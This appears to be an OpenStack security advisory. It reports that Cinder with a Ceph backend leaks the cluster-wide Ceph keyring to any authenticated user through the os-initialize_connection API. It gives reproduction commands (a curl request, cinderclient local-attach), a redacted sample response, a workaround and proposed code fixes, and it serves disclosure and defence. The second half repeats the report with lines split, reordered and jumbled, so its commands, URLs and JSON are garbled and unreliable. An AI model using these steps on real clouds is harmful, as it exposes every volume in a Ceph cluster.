Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files
As an authenticated simple user create a cinder volume that ends up on a ceph backend,
Then reuse the os.initialize_connection api call
(used by nova-compute/cinder-backup to attach volumes locally to the host running the services):
This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access
to all the volumes within the cluster.
Quick workaround:
1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure.
2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts
(/etc/cinder/<backend_name>.keyring.conf, to be confirmed).
Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in
libvirt secrets already, thus making this keyring disclose useless to it.
(to be confirmed, there may be other compute drivers that might be impacted by this)
Long term code fix proposals:
What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service
in order to attach volumes outside the scope of any virtual machines/nova.
Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose
anything that would allow him to do more than that.
Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster),
the related cinder backend for ceph should not implement this route at all
There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids,
if the attach is doomed to fail for users missing secret informations anyway.
Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to:
- check caller rw permissions on requested volumes
- escalate the request
- go through a new admin api route, not this 'user' one
Cinder + ceph backend, secret key leak
Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files
As an authenticated simple user create a cinder volume that ends up on a ceph backend, connection api call cinder- backup to attach volumes locally to the host running the services):
Then reuse the os.initialize_
(used by nova-compute/
curl -g -i -X POST https://<cinder_ controller> /v3/c495530af57 611e9bc14bbaa25 1e1e96/ volumes/ 7e59b91e- d426-4294- bfc5-dfdebcb218 79/action \ API-Version: volume 3.15" \ e_connection" : {"connector":{}}}'
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-H "OpenStack-
-H "X-Auth-Token: $TOKEN" \
-d '{"os-initializ
If you do not want to forge the http request, openstack clients and extensions may prove helpful.
As root:
apt-get install python3- oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common bin/activate openstackclient brick-cindercli ent-ext d426-4294- bfc5-dfdebcb218 79
virtualenv -p python3 venv_openstack
source venv_openstack/
pip install python-
pip install python-cinderclient
pip install os-brick
pip install python-
cinder create vol 1
cinder --debug local-attach 7e59b91e-
This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access
to all the volumes within the cluster.
{ info" : {
"access_ mode" : "rw",
"secret_ uuid" : "SECRET_UUID",
"cluster_ name" : "ceph",
"encrypted" : false,
"auth_ enabled" : true,
"qos_ specs" : {
"write_ iops_sec" : "3050",
"read_ iops_sec" : "3050" volume- 7e59b91e- d426-4294- bfc5-dfdebcb218 79",
"secret_ type" : "ceph",
"ceph_ host1",
"ceph_ host2",
"volume_ id" : "7e59b91e- d426-4294- bfc5-dfdebcb218 79",
"auth_ username" : "cinder" driver_ volume_ type" : "rbd"
"connection_
"data" : {
"discard" : true,
},
"keyring" : "SECRETFILETOHIDE",
"ports" : [
"6789",
"6789",
"6789"
],
"name" : "volumes/
"hosts" : [
...
],
},
"
}
}
Quick workaround: <backend_ name>.keyring. conf, to be confirmed).
1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure.
2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts
(/etc/cinder/
Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in
libvirt secrets already, thus making this keyring disclose useless to it.
(to be confirmed, there may be other compute drivers that might be impacted by this)
Quick code fix: /review. opendev. org/#/c/ 456672/ /review. opendev. org/#/c/ 465044/, not harmless in itself, but pointless once the first one has been reverted
Mandatory: revert this commit https:/
Optional: revert this one https:/
Long term code fix proposals: connection api call is meant to: allow simple users to use cinder as block storage as a service
What the os.initialize_
in order to attach volumes outside the scope of any virtual machines/nova.
Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose
anything that would allow him to do more than that.
Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster),
the related cinder backend for ceph should not implement this route at all
There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids,
if the attach is doomed to fail for users missing secret informations anyway.
Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to:
- check caller rw permissions on requested volumes
- escalate the request
- go through a new admin api route, not this 'user' one